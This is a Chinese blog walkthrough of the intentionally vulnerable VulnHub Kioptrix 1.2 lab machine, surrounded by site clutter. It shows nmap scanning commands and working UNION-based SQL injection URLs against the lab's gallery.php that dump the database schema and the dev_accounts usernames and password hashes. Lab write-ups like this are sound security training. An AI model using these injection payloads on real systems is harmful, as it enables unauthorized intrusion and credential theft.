Kioptrix-1.2打靶渗透

最新推荐文章于 2024-09-06 08:18:27 发布
最新推荐文章于 2024-09-06 08:18:27 发布
阅读量314 收藏 4
点赞数 3
分类专栏: 打靶日常 文章标签: 笔记 学习 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52487093/article/details/140813137
版权

靶机下载地址:https://download.vulnhub.com/kioptrix/KVM3.rar

1. 主机发现+端口扫描+目录扫描【192.168.1.128】

1.1. 主机发现

nmap -sn 192.168.1.0/24|grep -B 2 '00:0C:29:01:06:B7'

1.2. 端口扫描

nmap -p- 192.168.1.128

1.3. 目录扫描

2. web漏洞发掘

2.1. 进入80端口

  1. 老规矩,逐个点击功能点挖掘可能可以利用的功能点;->主页面点击now无法解析 -> 点击其他功能点,发现存在登录功能点,但与前者一样需绑定域名才可解析;

具体域名绑定流程请移步:

  1. 绑定成功后,查看now功能;-> 成功解析

  1. 老规矩,逐个点击功能点,挖掘可能存在的功能点;-> 出现可疑的sql注入点

  1. 存在回显,爆出库名
http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,database(),3,4,5,6

  1. 爆出库名 -> 爆出MD5加密的账号密码
http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,group_concat(column_name),3,4,5,6%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%27dev_accounts%27
http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,username,password,4,5,6%20from%20dev_accounts

  1. MD5解密

  1. SSH连接
橙则Kucei
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
电赛 2023运动目标控制与自动追踪系统(E题)-激光打靶(全套资料)
07-30
电赛 2023运动目标控制与自动追踪系统(E题)----激光打靶(全套资料),非常优秀的资源! 电赛 2023运动目标控制与自动追踪系统(E题)----激光打靶(全套资料),非常优秀的资源! 电赛 2023运动目标控制与自动...
Unity3D-Ai-技能-闪现-加速-打靶-鼠标指针隐藏
12-25
使用版本:2020.3.32 Ai概要: ...打靶概要: 一、从固定地点每隔固定时间发射飞盘 二、从固定地点每隔固定时间生成气球 玩家概要: 一:跳跃 二、血条 操作概要: 一、鼠标指针进入游戏窗口时隐藏
VulnHub靶机 DC-5 打靶 渗透测试详细过程
rumil的博客
04-18 1119
在访问/footer.php,/thankyou.php时发现跳转界面和原始界面的年份不一样,总是来回变动,刷新也会变动。目录爆破发现,存在file参数,尝试读取一下/etc/passwd文件,成功读取/etc/passwd文件并回显成功。当然既然知道了包含/footer.php文件,那么我们也可以去猜解参数,常用的如file,尝试一下即可,或者爆破。暴露出如下几个目录,去访问发现其中的目录,爆出的目录其中有一些界面为默认界面当中点击跳转的目录。给予sh文件执行权限,直接执行一下试试,成功提权。
DC-6 打靶渗透
m0_65112983的博客
08-12 903
DC-6打靶渗透
devt-improved 打靶渗透
m0_65112983的博客
08-08 577
devt-improved 打靶渗透
DC-4 打靶渗透
m0_65112983的博客
08-09 665
DC-4 打靶渗透
DC-2打靶渗透
m0_65112983的博客
08-14 374
DC-2 打靶渗透
Hacknos-ReconForce打靶渗透
m0_65112983的博客
07-14 417
Hacknos-ReconForce打靶渗透
Jangow-1.0.1打靶渗透
m0_65112983的博客
07-14 296
Jangow-1.0.1打靶渗透
Os-hackNos-3打靶渗透
m0_65112983的博客
07-14 155
Os-hackNos-3打靶渗透
Hacknos-OS-Hax打靶渗透
m0_65112983的博客
07-14 315
Hacknos-OS-Hax打靶渗透
35--[打靶游戏].zip源码scratch2.0 3.0编程项目源文件源码案例素材源代码
04-17
35--[打靶游戏].zip源码scratch2.0 3.0编程项目源文件源码案例素材源代码35--[打靶游戏].zip源码scratch2.0 3.0编程项目源文件源码案例素材源代码35--[打靶游戏].zip源码scratch2.0 3.0编程项目源文件源码案例素材源...
行业文档-设计装置-打靶用的可折卸式无纸靶板.zip
08-23
打靶用的可折卸式无纸靶板》是一个行业文档,主要涉及设计装置领域。这个压缩包包含了唯一的文件“打靶用的可折卸式无纸靶板.pdf”,可以推断这是一个详细阐述该装置设计、功能和应用的PDF文档。 在设计装置领域...
学习笔记】卫星通信NTN 3GPP标准化进展分析(六)- 参考标准
u011376987的博客
09-01 1152
本文总结了NTN标准化进程以及后续的研究计划,是学习NTN协议的入门。本文来自3GPP Joern Krause, 3GPP MCC。
维度不固定的多维数组形参笔记
H2z1220的博客
09-05 151
假如我有多个元素个数都不一致的多维数组都需要调用这个函数进行处理,这个形参问题就凸显出来了,总不能创建N个不同的函数来进行处理吧?这样也太繁琐了,而且也适用度不高。这个函数可以传入多维数组,但元素个数必须是固定的,假如传入一个str[][20],元素个数不一样的数组,那么这个函数就不适用了,且会报错。所有数据在存储空间里面都是有地址的,那么就可利用指针寻址来获取到相应的数据。在查找了一些资料后受到了一点启发。而这里也可利用指针来指向多维数组。
1-7 掩膜的运用 opencv树莓派4B 入门系列笔记
Sisphusssss的博客
09-02 1019
2、提前安装opencv库 以及 numpy库。1、树莓派4B 及 64位系统。4、计算掩膜覆盖物体的质心。5、计算掩膜物体的面积。2、计算掩膜覆盖的像素。
golang学习笔记06——怎么实现本地文件及目录监控-fsnotify
最新发布
GoppViper的博客
09-06 1488
Golang 的 fsnotify 库很方便对文件、目录做监控,这里的充满了想象力,因为一切皆文件,这代表着一切可监控。童鞋们,这里的想象空间非常大哦;通过 fsnotify 我们映证了 vim 的秘密;Golang 的 fsnotify 其实操作系统能力的浅层封装,Linux 本质就是对 inotify 机制;inotify 也是一个特殊句柄,属于匿名句柄之一,这个句柄用于文件的事件监控;
推荐一些渗透测试打靶的视频
05-01
以下是一些不错的渗透测试打靶视频: 1.《Web安全攻防之道》系列视频:这一系列视频讲解了渗透测试的基础知识和常用工具,并通过实际案例演示了如何利用漏洞进行攻击和防御。视频链接:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

橙则Kucei

感谢您的喜欢

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值